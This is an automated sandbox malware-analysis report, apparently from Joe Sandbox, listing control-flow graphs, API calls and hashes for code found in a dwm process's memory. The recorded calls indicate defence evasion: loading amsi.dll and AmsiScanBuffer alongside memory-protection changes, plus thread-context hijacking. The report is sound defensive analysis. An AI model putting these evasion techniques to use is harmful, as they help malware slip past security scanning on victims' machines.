                                                          control_flow_graph 151 2baaed96270-2baaed96297 152 2baaed96299-2baaed962a8 151->152 153 2baaed962ab-2baaed962b6 GetCurrentThreadId 151->153 152->153 154 2baaed962c2-2baaed962c9 153->154 155 2baaed962b8-2baaed962bd 153->155 156 2baaed962db-2baaed962ef 154->156 157 2baaed962cb-2baaed962d6 call 2baaed960a0 154->157 158 2baaed966ef-2baaed96706 call 2baaed98070 155->158 160 2baaed962fe-2baaed96304 156->160 157->158 163 2baaed963d5-2baaed963f6 160->163 164 2baaed9630a-2baaed96313 160->164 169 2baaed963fc-2baaed9641c GetThreadContext 163->169 170 2baaed9655f-2baaed96570 call 2baaed97bff 163->170 167 2baaed96315-2baaed96358 call 2baaeda3a40 164->167 168 2baaed9635a-2baaed963cd call 2baaed94c50 call 2baaed94bf0 call 2baaed94bb0 164->168 180 2baaed963d0 167->180 168->180 174 2baaed96422-2baaed96443 169->174 175 2baaed9655a 169->175 183 2baaed96575-2baaed9657b 170->183 174->175 184 2baaed96449-2baaed96452 174->184 175->170 180->160 186 2baaed9663e-2baaed9664e 183->186 187 2baaed96581-2baaed965d8 VirtualProtect FlushInstructionCache 183->187 188 2baaed964d2-2baaed964e3 184->188 189 2baaed96454-2baaed96465 184->189 198 2baaed9665e-2baaed9666a call 2baaed95530 186->198 199 2baaed96650-2baaed96657 186->199 192 2baaed96609-2baaed96639 call 2baaed97fdc 187->192 193 2baaed965da-2baaed965e4 187->193 196 2baaed96555 188->196 197 2baaed964e5-2baaed96503 188->197 194 2baaed96467-2baaed9647c 189->194 195 2baaed964cd 189->195 192->183 193->192 201 2baaed965e6-2baaed96601 call 2baaed94ad0 193->201 194->195 202 2baaed9647e-2baaed964c8 call 2baaed940b0 SetThreadContext 194->202 195->196 197->196 204 2baaed96505-2baaed9654c call 2baaed94040 197->204 212 2baaed9666f-2baaed96675 198->212 199->198 205 2baaed96659 call 2baaed94b20 199->205 201->192 202->195 204->196 218 2baaed96550 call 2baaed97c1d 204->218 205->198 216 2baaed966b7-2baaed966d5 212->216 217 2baaed96677-2baaed966b5 ResumeThread call 2baaed97fdc 212->217 220 2baaed966d7-2baaed966e6 216->220 221 2baaed966e9 216->221 217->212 218->196 220->221 221->158
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Thread$Current$Context
                                                          • String ID:
                                                          • API String ID: 1666949209-0
                                                          • Opcode ID: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
                                                          • Instruction ID: 5bc781beb160d2fd45ef9ba7d8739146d33495e58988d0860e39064703ce5f79
                                                          • Opcode Fuzzy Hash: 2ff11c1be90479a1e6cf58369367b5af2ea5d024f86bdfb82a75ac5a15ce7897
                                                          • Instruction Fuzzy Hash: 7ED19F76204B88C5EA70DB1AE49835A77B0F3C8B88F204116EADD47B65EF3DC551CB15

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 223 2baaed91e3c-2baaed91e60 LoadLibraryA GetProcAddress 224 2baaed91e62-2baaed91e6d SleepEx 223->224 225 2baaed91e6f-2baaed91e73 223->225 224->224
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: f0304237f90cd391fe44c7f1dc9f3b070c42349d1f4a7b88577a658600086084
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: 76D09E50611600E5FA087F21EC5C3693372BF64B41FF40819C58E037A0EF2E8A69C372

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 226 2baaed95810-2baaed9583c 227 2baaed9584d-2baaed95856 226->227 228 2baaed9583e-2baaed95846 226->228 229 2baaed95867-2baaed95870 227->229 230 2baaed95858-2baaed95860 227->230 228->227 231 2baaed95872-2baaed9587a 229->231 232 2baaed95881-2baaed9588a 229->232 230->229 231->232 233 2baaed95896-2baaed958a1 GetCurrentThreadId 232->233 234 2baaed9588c-2baaed95891 232->234 236 2baaed958a3-2baaed958a8 233->236 237 2baaed958ad-2baaed958b4 233->237 235 2baaed95e13-2baaed95e1a 234->235 236->235 238 2baaed958b6-2baaed958bc 237->238 239 2baaed958c1-2baaed958ca 237->239 238->235 240 2baaed958d6-2baaed958e2 239->240 241 2baaed958cc-2baaed958d1 239->241 242 2baaed958e4-2baaed95909 240->242 243 2baaed9590e-2baaed95965 call 2baaed95e20 * 2 240->243 241->235 242->235 248 2baaed95967-2baaed9596e 243->248 249 2baaed9597a-2baaed95983 243->249 250 2baaed95976 248->250 251 2baaed95970 248->251 252 2baaed95995-2baaed9599e 249->252 253 2baaed95985-2baaed95992 249->253 255 2baaed959e6-2baaed959ea 250->255 254 2baaed959f0-2baaed959f6 251->254 256 2baaed959b3-2baaed959d8 call 2baaed97fa0 252->256 257 2baaed959a0-2baaed959b0 252->257 253->252 259 2baaed95a25-2baaed95a2b 254->259 260 2baaed959f8-2baaed95a14 call 2baaed94ad0 254->260 255->254 265 2baaed95a6d-2baaed95a82 call 2baaed94400 256->265 266 2baaed959de 256->266 257->256 263 2baaed95a55-2baaed95a68 259->263 264 2baaed95a2d-2baaed95a4c call 2baaed97fdc 259->264 260->259 269 2baaed95a16-2baaed95a1e 260->269 263->235 264->263 273 2baaed95a84-2baaed95a8c 265->273 274 2baaed95a91-2baaed95a9a 265->274 266->255 269->259 273->255 275 2baaed95aac-2baaed95afa call 2baaeda40e0 274->275 276 2baaed95a9c-2baaed95aa9 274->276 279 2baaed95b02-2baaed95b0a 275->279 276->275 280 2baaed95c17-2baaed95c1f 279->280 281 2baaed95b10-2baaed95bfb call 2baaed97b80 279->281 282 2baaed95c63-2baaed95c6b 280->282 283 2baaed95c21-2baaed95c34 call 2baaed94cd0 280->283 293 2baaed95bfd 281->293 294 2baaed95bff-2baaed95c0e call 2baaed947a0 281->294 286 2baaed95c77-2baaed95c86 282->286 287 2baaed95c6d-2baaed95c75 282->287 295 2baaed95c36 283->295 296 2baaed95c38-2baaed95c61 283->296 291 2baaed95c88 286->291 292 2baaed95c8f 286->292 287->286 290 2baaed95c94-2baaed95ca1 287->290 298 2baaed95ca3 290->298 299 2baaed95ca4-2baaed95cf9 call 2baaeda3a40 290->299 291->292 292->290 293->280 303 2baaed95c12 294->303 304 2baaed95c10 294->304 295->282 296->280 298->299 305 2baaed95d08-2baaed95da1 call 2baaed94c50 call 2baaed94bb0 VirtualProtect 299->305 306 2baaed95cfb-2baaed95d03 299->306 303->279 304->280 311 2baaed95da3-2baaed95da8 GetLastError 305->311 312 2baaed95db1-2baaed95e11 305->312 311->312 312->235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
                                                          • Instruction ID: d9c91d4dc7dd589e4fbddafb3cc96b078726c72af6732c899133ce16f2e79dbe
                                                          • Opcode Fuzzy Hash: d1efe80aa896adf56c352d5c0170c98584534c44e36adba6730078e70e045cb7
                                                          • Instruction Fuzzy Hash: 1502DB32219B8486E760DB55F89435AB7B0F3C4794F204525EACE87BA8EF7DC854CB21

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 1092925422-0
                                                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction ID: 9fd60d6837ff686c1d078e5eb21027c135e20bcc6250a287a4ac797794eff323
                                                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                                          • Instruction Fuzzy Hash: F611213660574093EB24AF25E44821AB7B0FB45B84F140526DE9D03BA4FF7ECA58C795
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2062869608.000002BAAF190000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAF190000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaf190000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$AllocLibraryLoad
                                                          • String ID:
                                                          • API String ID: 3316853933-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 17ae07a96ee92c414d6a29946f38cb326e9a423036338e808e7df0aa7be525c4
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: EB913673B0115087DB688F25D48876DBBA5F754B94F488032DF4987798DB3BD802C7A1
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2183641314.000002BAAEDD0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEDD0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaedd0000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$Alloc
                                                          • String ID:
                                                          • API String ID: 2541858876-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 546b4e0841fcc02726d2a51b73a6171003f6c438c4358d43e61834e2062fd656
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 5E911873B02255C7DB648F25D488B7DB3A1F754B94F6881269E8D877C8DB38D812C721
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000003.2236561607.000002BAAEE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAEE30000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_3_2baaee30000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$Protect$Alloc
                                                          • String ID:
                                                          • API String ID: 2541858876-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 554437a51a7a95f47f4d780ffa64d137e3021be52d4fc50a8420efd31f5194c9
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 39912572B0125297EB748F25D408B7DB3B1FB54B98F6C91249EA907F89DB38D812C721

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Virtual$AllocQuery
                                                          • String ID:
                                                          • API String ID: 31662377-0
                                                          • Opcode ID: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction ID: 62ca7807458fb13d4273c6e45d62c98dc4af8937a2e75a1e4332839c265ae0d6
                                                          • Opcode Fuzzy Hash: a8802b86f0811ea88e9113a3d60b8cb8649c82089feb35d3c44dd7bdfe1e6621
                                                          • Instruction Fuzzy Hash: F4315322219A4481EA70DB55E89835E7BB4F388788F200525F5CD47F99FF3EC980CBA5

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 000002BAAED93A35
                                                          • PathFindFileNameW.SHLWAPI ref: 000002BAAED93A44
                                                            • Part of subcall function 000002BAAED93F88: StrCmpNIW.SHLWAPI(?,?,?,000002BAAED9272F), ref: 000002BAAED93FA0
                                                            • Part of subcall function 000002BAAED93EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93EDB
                                                            • Part of subcall function 000002BAAED93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F0E
                                                            • Part of subcall function 000002BAAED93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F2E
                                                            • Part of subcall function 000002BAAED93EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F47
                                                            • Part of subcall function 000002BAAED93EC8: VirtualProtectEx.KERNELBASE(?,?,?,?,?,000002BAAED93A5B), ref: 000002BAAED93F68
                                                          • CreateThread.KERNELBASE ref: 000002BAAED93A8B
                                                            • Part of subcall function 000002BAAED91E74: GetCurrentThread.KERNEL32 ref: 000002BAAED91E7F
                                                            • Part of subcall function 000002BAAED91E74: CreateThread.KERNELBASE ref: 000002BAAED92043
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92049
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92055
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92061
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED9206D
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92079
                                                            • Part of subcall function 000002BAAED91E74: TlsAlloc.KERNEL32 ref: 000002BAAED92085
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: 09b2e1fafa1a3fe18016e9f9a923ce9fe020257aefd4cfda65106ec6af018d25
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: A4115A6561064192FBA0A720AD4D3AD73B1A794345FB0412994CE86AD0FF7ECD58C633

                                                          Control-flow Graph

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                          • String ID:
                                                          • API String ID: 3733156554-0
                                                          • Opcode ID: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
                                                          • Instruction ID: d1a6b5c8f0e4d17bb4bdfb15b6de690a98702892b9d2224172b62c2489fba496
                                                          • Opcode Fuzzy Hash: 8659059d713f10fb2b36df29fda00c285aebd80b25688c8f1dc0718561e99dbb
                                                          • Instruction Fuzzy Hash: A7F03026218B44C0D670EB05E86574A77B0E3C8BD4F244111FACD07F69DF3AC980CB21

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 000002BAAED91724: GetProcessHeap.KERNEL32 ref: 000002BAAED9172F
                                                            • Part of subcall function 000002BAAED91724: HeapAlloc.KERNEL32 ref: 000002BAAED9173E
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED917AE
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED917DB
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED917F5
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91815
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.KERNELBASE ref: 000002BAAED91830
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91850
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED9186B
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED9188B
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED918A6
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED918C6
                                                          • SleepEx.KERNELBASE ref: 000002BAAED91BDF
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED918E1
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91901
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED9191C
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED9193C
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED91957
                                                            • Part of subcall function 000002BAAED91724: RegOpenKeyExW.KERNELBASE ref: 000002BAAED91977
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.ADVAPI32 ref: 000002BAAED91992
                                                            • Part of subcall function 000002BAAED91724: RegCloseKey.KERNELBASE ref: 000002BAAED9199C
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: e9fd47210766d6569e59dd8c20d80ed9a0c09a2ff7de7f8689da7331f05a9ba0
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 8D312E6520065181FB54AB36DE49369B3B4AB44BC0F3654298E9D87B9AFF27CC50C236

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 408 2baaed9f370-2baaed9f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
                                                          • Associated: 0000000E.00000002.2405294038.000002BAAED90000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405573335.000002BAAEDA5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405695061.000002BAAEDB0000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405812778.000002BAAEDB2000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2405942174.000002BAAEDB9000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaed90000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: 25316a16912ca12bc714b53722a03786effec4f62070619cf2aaf5c36f98a599
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: BAD01225B31540C3F300DB11D8597957338F398701FD04009E98D92694DF7CC259CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 409 2baaee0f370-2baaee0f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406225557.000002BAAEE01000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE00000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406053605.000002BAAEE00000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406311144.000002BAAEE15000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406401391.000002BAAEE20000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406565528.000002BAAEE22000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406629188.000002BAAEE29000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee00000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: f7fd4c512c6ef310e7b18dd7c690a35b185d764d70a9a2e2a72a94665c0beb33
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: 44D01225731540D3F710DF51D849B957339F398701FD04009E98982A98CF7CC699CB61

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 410 2baaee6f370-2baaee6f39f VirtualProtect
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2406821651.000002BAAEE61000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAEE60000, based on PE: true
                                                          • Associated: 0000000E.00000002.2406712710.000002BAAEE60000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2406937121.000002BAAEE75000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2407031430.000002BAAEE80000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2407274554.000002BAAEE82000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.2407383423.000002BAAEE89000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2baaee60000_dwm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction ID: f1b8af5bd91885cd0305abdc11aacc5b5dbe0f2f4fc016c1b1ab739c1f334080
                                                          • Opcode Fuzzy Hash: b40d5d27bf97adee7439d23d1349d8a0deaf4876dc796fe70c0d47fc6773842e
                                                          • Instruction Fuzzy Hash: D8D01225731580D3F310DB11D8497A57339F398701FE04005E98982A98CF7CC659CB61
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.2405412924.000002BAAED91000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002BAAED90000, based on PE: true
